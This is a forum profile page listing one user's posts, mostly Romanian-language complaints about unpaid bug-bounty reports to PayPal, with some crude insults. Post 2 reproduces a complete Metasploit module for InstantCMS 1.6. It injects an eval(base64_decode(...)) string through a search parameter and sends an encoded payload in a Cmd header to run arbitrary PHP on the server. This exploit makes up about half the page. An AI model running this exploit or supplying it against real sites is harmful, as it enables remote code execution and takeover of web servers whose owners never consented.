Jump to content

akkiliON

Active Members
  • Posts

    1179
  • Joined

  • Last visited

  • Days Won

    48

Everything posted by akkiliON

  1. http://www.schubergphilis.com/newsroom/library/downloads-policies/responsible-disclosure-policy/
  2. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'InstantCMS 1.6 Remote PHP Code Execution', 'Description' => %q{ This module exploits an arbitrary php command execution vulnerability, because of a dangerous use of eval(), in InstantCMS versions 1.6. }, 'Author' => [ 'AkaStep', # Vulnerability discovery and PoC 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '60816' ], [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'InstantCMS 1.6', { } ], ], 'DisclosureDate' => 'Jun 26 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"]) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.to_s), 'vars_get' => { 'view' => 'search', 'query' => '${echo phpinfo()}' } }) if res if res.body.match(/Build Date/) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Unknown end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout return Exploit::CheckCode::Unknown end def exploit print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.to_s), 'vars_get' => { 'view' => 'search', 'query' => rand_text_alpha(3 + rand(3)), 'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//" }, 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } }) end end http://www.exploit-db.com/exploits/26622/
  3. XSS PERSISTENT ? Ala e 100 % XSS-ul lui florin ! // Edit: Epic
  4. Ce tip de vulnerabilitate ai gasit ? Intrebam doar
  5. Eu nu am avut nici o treaba cu eBay ! Am completat acel formular de pe site-ul lor, dupaia a durat ceva timp pana l-au fixat, si ultima faza m-au intrebat daca cumva doresc sa fiu adaugat in lista !
  6. // Acum merge Felicit?ri pentru vulnerabilit??ile g?site Am fost ?i eu nervos când am v?zut c? or reparat problema ?i nu am mai primit nici un r?spuns. Sunt ni?te ho?i ?i nesim?i?i !
  7. Te în?eli amarnic dac? crezi asta !
  8. Se pare c? nu sunt singurul de aici care ?i-a luat ?eap? Pe mine nici nu m-au b?gat în seam? ! Au reparat problema ?i nu am primit nici un r?spuns ! MUIE PAYPAL FOREVER
  9. @hate.me M? pi? pe eeeei ! Nu ai primit prima rat? ?
  10. S? le dau muie cu g?leata celor de la Paypal ! Au reparat problema ?i nu am mai primit nici un r?spuns ! Nu are rost sa c?uta?i la ei ! Deci MUIE Paypal Am zis c? am s? fac un video ?i am s? îl uploadez pe youtube ! Enjoy ! https://www.youtube.com/watch?v=URLVoG-JBJk
  11. Bine atunci c? mi-ai zis ! Nu o s? mai caut atât la ei !
  12. Eu zic c? trebuie s? primeasca 750 $ E in Paypal.com ! Nu în Paypal-*.com https://www.paypal.com/us/webapps/mpp/security-tools/reporting-security-issues Atâta timp cât au spus c? e valid? nu cred c? nu ar primii ceva !
  13. Eu sunt curios când prime?ti prima rat?
  14. E ala care l-am gasit si eu ? Acela care mi-a spus ca e duplicate si care nu l-au rezolvat ) ?? Sau ai gasit altu
  15. Nu se prea merit? s? cau?i atât la ei dac? sunt a?a de neserio?i Iar pe information disclosure dau foarte pu?in ?i pe XSS-uri ! M?car s? fi pus pe un XSS in domeniu sau subdomeniu s? prime?ti 1000 $ ! Iar pe Information Disclosure = 2000 $ ! Acuma nu vreau s? zic c? Paypal e Google ! Dar poate s? ofere mai mult la câ?i bani au !
  16. Ai mai primit raspuns ca or fixat problema mah_one ?
  17. Firefox & Chrome here ! Foarte urât? faza cu cei de la Opera !
  18. Da, acolo l-am gasit ! Si mi-au raspuns fix cum ai spus
  19. # Exploit: *.BillMeLater.com - XSS ( Cross Site Scripting ) # Author: akkiliON # Link URL: BillMeLater # PoC: # Vulnerability Reported !
  20. Cat mai multe hate.me ! Sper sa fie valid si al meu
  21. Tricoul o sa imi vina pe marti deoarece am ratat astazi ocazia
  22. Eu cunosc pe cineva care a primit un tricou de la yahoo si la primit in maxim 7 zile ( el sta prin Suceava ) Acum depinde
  23. Astazi ar trebui sa primesc. Vinerea trecuta am trimis datele si din cate stiu 7 zile trebuie sa astepti !
×
×
  • Create New...